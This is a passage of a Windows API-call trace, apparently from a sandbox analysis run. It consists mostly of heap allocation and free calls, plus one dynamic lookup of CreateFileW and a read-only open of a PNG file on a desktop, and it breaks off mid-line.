[0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c98 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0128.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0128.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0128.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0128.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0128.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0128.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0128.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0128.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0128.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0128.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0128.566] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0128.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0128.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0128.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0128.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0128.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0128.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0128.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0128.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0128.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0128.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0128.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0128.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0128.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0128.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0128.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0128.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0128.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0128.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0128.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0128.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0128.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0128.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0128.569] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0128.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0128.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0128.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0128.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0128.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0128.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0128.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0128.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0128.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0128.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0128.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0128.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0128.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0128.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0128.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0128.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0128.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0128.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0128.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0128.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0128.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0128.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0128.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0128.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0128.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0128.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0128.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0128.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0128.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0128.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0128.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0128.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0128.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0128.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0128.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0128.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0128.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0128.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0128.571] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0128.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0128.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0128.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0128.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0128.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca898, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0128.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0128.572] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0128.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0128.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0128.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0128.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0128.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0128.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0128.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0128.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0128.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0128.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0128.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0128.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0128.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0128.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0128.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0128.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0128.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0128.572] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\_uPhYhD.png" (normalized: "c:\\users\\fd1hvy\\desktop\\_uphyhd.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0128.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0128.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9128 [0128.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0128.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0128.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0128.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0128.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0128.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0128.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0128.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0128.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0128.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0128.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0128.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0128.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0128.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0128.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0128.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0128.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0128.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0128.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 